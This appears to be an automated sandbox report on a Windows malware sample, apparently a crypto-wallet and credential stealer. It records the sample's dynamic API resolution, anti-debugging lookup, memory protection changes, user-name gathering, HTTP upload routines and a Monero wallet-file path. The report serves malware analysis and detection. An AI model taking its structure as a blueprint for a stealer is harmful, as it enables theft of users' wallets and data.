15906->15907 15908 64546e 15907->15908 15909 65a8a0 lstrcpy 15908->15909 16001 658ead CryptBinaryToStringA 16000->16001 16002 658ea9 16000->16002 16001->16002 16003 658ece GetProcessHeap RtlAllocateHeap 16001->16003 16002->15846 16003->16002 16004 658ef4 codecvt 16003->16004 16005 658f05 CryptBinaryToStringA 16004->16005 16005->16002 16009->15284 16252 649880 16010->16252 16012 6498e1 16012->15291 16014 65a740 lstrcpy 16013->16014 16187 65a740 lstrcpy 16186->16187 16188 650266 16187->16188 16189 658de0 2 API calls 16188->16189 16190 65027b 16189->16190 16191 65a920 3 API calls 16190->16191 16192 65028b 16191->16192 16193 65a8a0 lstrcpy 16192->16193 16194 650294 16193->16194 16195 65a9b0 4 API calls 16194->16195 16196 6502b8 16195->16196 16253 64988d 16252->16253 16256 646fb0 16253->16256 16255 6498ad codecvt 16255->16012 16259 646d40 16256->16259 16260 646d63 16259->16260 16274 646d59 16259->16274 16275 646530 16260->16275 16264 646dbe 16264->16274 16285 6469b0 16264->16285 16266 646e2a 16267 646ee6 VirtualFree 16266->16267 16269 646ef7 16266->16269 16266->16274 16267->16269 16268 646f41 16270 6589f0 2 API calls 16268->16270 16268->16274 16269->16268 16271 646f26 FreeLibrary 16269->16271 16272 646f38 16269->16272 16270->16274 16271->16269 16273 6589f0 2 API calls 16272->16273 16273->16268 16274->16255 16276 646542 16275->16276 16278 646549 16276->16278 16295 658a10 GetProcessHeap RtlAllocateHeap 16276->16295 16278->16274 16279 646660 16278->16279 16284 64668f VirtualAlloc 16279->16284 16281 646730 16282 646743 VirtualAlloc 16281->16282 16283 64673c 16281->16283 16282->16283 16283->16264 16284->16281 16284->16283 16286 6469c9 16285->16286 16287 6469d5 16285->16287 16286->16287 16288 646a09 LoadLibraryA 16286->16288 16287->16266 16288->16287 16289 646a32 16288->16289 16292 646ae0 16289->16292 16296 658a10 GetProcessHeap RtlAllocateHeap 16289->16296 16291 646ba8 GetProcAddress 16291->16287 16291->16292 16292->16287 16292->16291 16293 6589f0 2 API calls 16293->16292 16294 646a8b 16294->16287 16294->16293 16295->16278 16296->16294

                              Executed Functions

                              Function 00659860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 659860-659874 call 659750 663 659a93-659af2 LoadLibraryA * 5 660->663 664 65987a-659a8e call 659780 GetProcAddress * 21 660->664 666 659af4-659b08 GetProcAddress 663->666 667 659b0d-659b14 663->667 664->663 666->667 668 659b46-659b4d 667->668 669 659b16-659b41 GetProcAddress * 2 667->669 671 659b4f-659b63 GetProcAddress 668->671 672 659b68-659b6f 668->672 669->668 671->672 673 659b71-659b84 GetProcAddress 672->673 674 659b89-659b90 672->674 673->674 675 659bc1-659bc2 674->675 676 659b92-659bbc GetProcAddress * 2 674->676 676->675
                              APIs
                              • GetProcAddress.KERNEL32(76210000,013D1630), ref: 006598A1
                              • GetProcAddress.KERNEL32(76210000,013D1540), ref: 006598BA
                              • GetProcAddress.KERNEL32(76210000,013D1558), ref: 006598D2
                              • GetProcAddress.KERNEL32(76210000,013D15B8), ref: 006598EA
                              • GetProcAddress.KERNEL32(76210000,013D16A8), ref: 00659903
                              • GetProcAddress.KERNEL32(76210000,013D8B38), ref: 0065991B
                              • GetProcAddress.KERNEL32(76210000,013C52B0), ref: 00659933
                              • GetProcAddress.KERNEL32(76210000,013C5310), ref: 0065994C
                              • GetProcAddress.KERNEL32(76210000,013D15D0), ref: 00659964
                              • GetProcAddress.KERNEL32(76210000,013D16D8), ref: 0065997C
                              • GetProcAddress.KERNEL32(76210000,013D16C0), ref: 00659995
                              • GetProcAddress.KERNEL32(76210000,013D1600), ref: 006599AD
                              • GetProcAddress.KERNEL32(76210000,013C5170), ref: 006599C5
                              • GetProcAddress.KERNEL32(76210000,013D1570), ref: 006599DE
                              • GetProcAddress.KERNEL32(76210000,013D1750), ref: 006599F6
                              • GetProcAddress.KERNEL32(76210000,013C5090), ref: 00659A0E
                              • GetProcAddress.KERNEL32(76210000,013D16F0), ref: 00659A27
                              • GetProcAddress.KERNEL32(76210000,013D1720), ref: 00659A3F
                              • GetProcAddress.KERNEL32(76210000,013C50B0), ref: 00659A57
                              • GetProcAddress.KERNEL32(76210000,013D17C8), ref: 00659A70
                              • GetProcAddress.KERNEL32(76210000,013C5050), ref: 00659A88
                              • LoadLibraryA.KERNEL32(013D1888,?,00656A00), ref: 00659A9A
                              • LoadLibraryA.KERNEL32(013D17E0,?,00656A00), ref: 00659AAB
                              • LoadLibraryA.KERNEL32(013D1870,?,00656A00), ref: 00659ABD
                              • LoadLibraryA.KERNEL32(013D1810,?,00656A00), ref: 00659ACF
                              • LoadLibraryA.KERNEL32(013D17F8,?,00656A00), ref: 00659AE0
                              • GetProcAddress.KERNEL32(75B30000,013D1828), ref: 00659B02
                              • GetProcAddress.KERNEL32(751E0000,013D1840), ref: 00659B23
                              • GetProcAddress.KERNEL32(751E0000,013D1858), ref: 00659B3B
                              • GetProcAddress.KERNEL32(76910000,013D8F30), ref: 00659B5D
                              • GetProcAddress.KERNEL32(75670000,013C50D0), ref: 00659B7E
                              • GetProcAddress.KERNEL32(77310000,013D8B88), ref: 00659B9F
                              • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00659BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00659BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: fe0348fa7b18d2a2399939c2d62f4dbc0cf84639863343ced39edd8a9e3597ed
                              • Instruction ID: b5b404f1dacbf9f6270988bdd232084e045c169245ad071c34310565ce20b910
                              • Opcode Fuzzy Hash: fe0348fa7b18d2a2399939c2d62f4dbc0cf84639863343ced39edd8a9e3597ed
                              • Instruction Fuzzy Hash: C5A12AB55002449FF34CEFACEE88A663BF9F74C701704452BA645D32E4D739A852EB62
                              Function 006445C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 6445c0-644695 RtlAllocateHeap 781 6446a0-6446a6 764->781 782 6446ac-64474a 781->782 783 64474f-6447a9 VirtualProtect 781->783 782->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0064460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0064479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0064466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006446CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006445F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00644770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00644683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00644657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006445E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006446AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006445DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00644638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0064471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00644678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006445D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00644734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0064475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006445C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00644713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0064477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00644662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00644622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0064473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00644643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006446B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006446D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0064474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006446C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00644617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0064462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00644729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00644765
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 9302a1a59fa3b3ab6568dc64b40edefd4973f1d69210432276beacb15f5f76f4
                              • Instruction ID: 0f751e28722541409fd3dcb82d276f9201d56b82c647f8c85362240c33671c82
                              • Opcode Fuzzy Hash: 9302a1a59fa3b3ab6568dc64b40edefd4973f1d69210432276beacb15f5f76f4
                              • Instruction Fuzzy Hash: E141F6747C268CFACF6CFBA4984FE9DBA777FCAB08F515044A80153282DFB069804566
                              Function 00644880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 644880-644942 call 65a7a0 call 6447b0 call 65a740 * 5 InternetOpenA StrCmpCA 816 644944 801->816 817 64494b-64494f 801->817 816->817 818 644955-644acd call 658b60 call 65a920 call 65a8a0 call 65a800 * 2 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a920 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a920 call 65a8a0 call 65a800 * 2 InternetConnectA 817->818 819 644ecb-644ef3 InternetCloseHandle call 65aad0 call 649ac0 817->819 818->819 905 644ad3-644ad7 818->905 829 644ef5-644f2d call 65a820 call 65a9b0 call 65a8a0 call 65a800 819->829 830 644f32-644fa2 call 658990 * 2 call 65a7a0 call 65a800 * 8 819->830 829->830 906 644ae5 905->906 907 644ad9-644ae3 905->907 908 644aef-644b22 HttpOpenRequestA 906->908 907->908 909 644ebe-644ec5 InternetCloseHandle 908->909 910 644b28-644e28 call 65a9b0 call 65a8a0 call 65a800 call 65a920 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a920 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a920 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a920 call 65a8a0 call 65a800 call 65a740 call 65a920 * 2 call 65a8a0 call 65a800 * 2 call 65aad0 lstrlen call 65aad0 * 2 lstrlen call 65aad0 HttpSendRequestA 908->910 909->819 1021 644e32-644e5c InternetReadFile 910->1021 1022 644e67-644eb9 InternetCloseHandle call 65a800 1021->1022 1023 644e5e-644e65 1021->1023 1022->909 1023->1022 1024 644e69-644ea7 call 65a9b0 call 65a8a0 call 65a800 1023->1024 1024->1021
                              APIs
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 006447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00644839
                                • Part of subcall function 006447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00644849
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00644915
                              • StrCmpCA.SHLWAPI(?,013DEC50), ref: 0064493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00644ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00660DDB,00000000,?,?,00000000,?,",00000000,?,013DEBC0), ref: 00644DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00644E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00644E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00644E49
                              • InternetCloseHandle.WININET(00000000), ref: 00644EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00644EC5
                              • HttpOpenRequestA.WININET(00000000,013DEBE0,?,013DE238,00000000,00000000,00400100,00000000), ref: 00644B15
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                              • InternetCloseHandle.WININET(00000000), ref: 00644ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: e45a2f1ae55beadcb9928d4a86f9389526d612104a7e14f92ec0bbd9c5345f3e
                              • Instruction ID: 5530563444ffbe4d9a9b848b56308594c121c6a5637759230aa9494d024f33c8
                              • Opcode Fuzzy Hash: e45a2f1ae55beadcb9928d4a86f9389526d612104a7e14f92ec0bbd9c5345f3e
                              • Instruction Fuzzy Hash: C012DB71911118AADB59EB90DC92FEEB37ABF14301F50429DB50662091EF702F4DCF6A
                              Function 00657850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006411B7), ref: 00657880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00657887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0065789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: aca896b47c1934556dc1c47ffd2261b6414a4df7b08bdfa683193b68126ff4dc
                              • Instruction ID: 89815684652d09f542500b2b5cb1d9d4f1159e10c9aee17d9725f2ae85d0bc5d
                              • Opcode Fuzzy Hash: aca896b47c1934556dc1c47ffd2261b6414a4df7b08bdfa683193b68126ff4dc
                              • Instruction Fuzzy Hash: 00F04FB1944208ABD714DF98DD49BAEBBB8FB04712F10026AFA05A26C0C77515048BA1
                              Function 00641160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
